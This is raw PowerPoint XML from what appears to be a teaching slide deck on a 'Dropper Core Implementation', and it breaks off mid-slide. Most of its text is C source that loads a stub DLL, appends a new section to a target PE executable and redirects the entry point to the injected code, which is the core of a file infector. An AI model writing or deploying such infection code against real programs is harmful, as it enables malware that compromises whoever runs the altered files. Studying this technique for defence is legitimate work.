                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="318770"/>
            <a:ext cx="1120648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Dropper Core Implementation- Load infected program</a:t>
            </a:r>
            <a:endPar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p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331153" y="1263015"/>
            <a:ext cx="11553190" cy="4892675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>VOID LoadDllStub(LPCSTR FileName)</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 Load the module into the current memory without executing DllMain</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DllBase = (DWORD)LoadLibraryExA(FileName, NULL, DONT_RESOLVE_DLL_REFERENCES);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pP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 Obtain the start function from the dll and calculate its intra-section offset </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//(load base address + section base address + intra-section offset)</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DWORD Start = (DWORD)GetProcAddress((HMODULE)DllBase, "start");</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StartOffset = Start - DllBase - GetSection(DllBase, ".text")-&gt;VirtualAddress;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pP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 Share Data</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	ShareData = (PSHAREDATA)GetProcAddress((HMODULE)DllBase, "ShareData");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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Dropper Core Implementation</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custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1361123" y="1219835"/>
            <a:ext cx="9469755" cy="4939030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>VOID AddSection(LPCSTR SectionName, LPCSTR SrcName)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	// 1. Get the address of the last section in the section table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	auto LastSection = &amp;IMAGE_FIRST_SECTION(NtHeader(FileBase))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>		[FileHeader(FileBase)-&gt;NumberOfSections - 1];</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	// 2. Add the number of sections saved in the file header by 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	FileHeader(FileBase)-&gt;NumberOfSections += 1;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	// 3. Find the position of the newly added section through the old last section</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	auto NewSection = LastSection + 1;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	memset(NewSection, 0, sizeof(IMAGE_SECTION_HEADER));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	// 4.  Find the section we need to copy from the dll</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>	auto SrcSection = GetSection(DllBase, SrcName);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="975360" y="318770"/>
            <a:ext cx="1118171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Dropper Core Implementation- Add a new section</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118171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Dropper Core Implementation-Add a new section</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3" name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="708025" y="1053465"/>
            <a:ext cx="10775950" cy="5315585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>                // 5. Copy the complete information of the source section to the new section</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	memcpy(NewSection, SrcSection, sizeof(IMAGE_SECTION_HEADER));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// 6. Set the section name</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	memcpy(NewSection-&gt;Name, SectionName, 7);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// 7. Set the RVA of the new section  = the RVA of the old last section + aligned memory size</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	NewSection-&gt;VirtualAddress = LastSection-&gt;VirtualAddress +</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>		Alignment(LastSection-&gt;Misc.VirtualSize, OptHeader(FileBase)-&gt;SectionAlignment);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// 8. Set the FOA of the new section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> =  the FOA of the old last section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> + aligned file size</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	NewSection-&gt;PointerToRawData = LastSection-&gt;PointerToRawData +</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>		Alignment(LastSection-&gt;SizeOfRawData, OptHeader(FileBase)-&gt;FileAlignment);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// 9. Recalculate the file size and apply for new space to save the original data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	FileSize = NewSection-&gt;SizeOfRawData + NewSection-&gt;PointerToRawData;</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	FileBase = (DWORD)realloc((VOID*)FileBase, FileSize);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// 11. Set SizeOfImage = RVA of the new last section + memory size of the new last section</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	OptHeader(FileBase)-&gt;SizeOfImage = NewSection-&gt;VirtualAddress + NewSection-&gt;Misc.VirtualSize;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs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118171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Dropper Core Implementation-Reset Entry </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3" name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1327785" y="1197610"/>
            <a:ext cx="9536430" cy="4961890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>// Reset OEP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VOID SetOEP()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// Before modifying the original OEP, save the OEP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	ShareData-&gt;OldOep = OptHeader(FileBase)-&gt;AddressOfEntryPoint;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// --------------------AddressOfEntryPoint----------------------</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>	// new OEP = the offset in the section  + RVA of new section</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
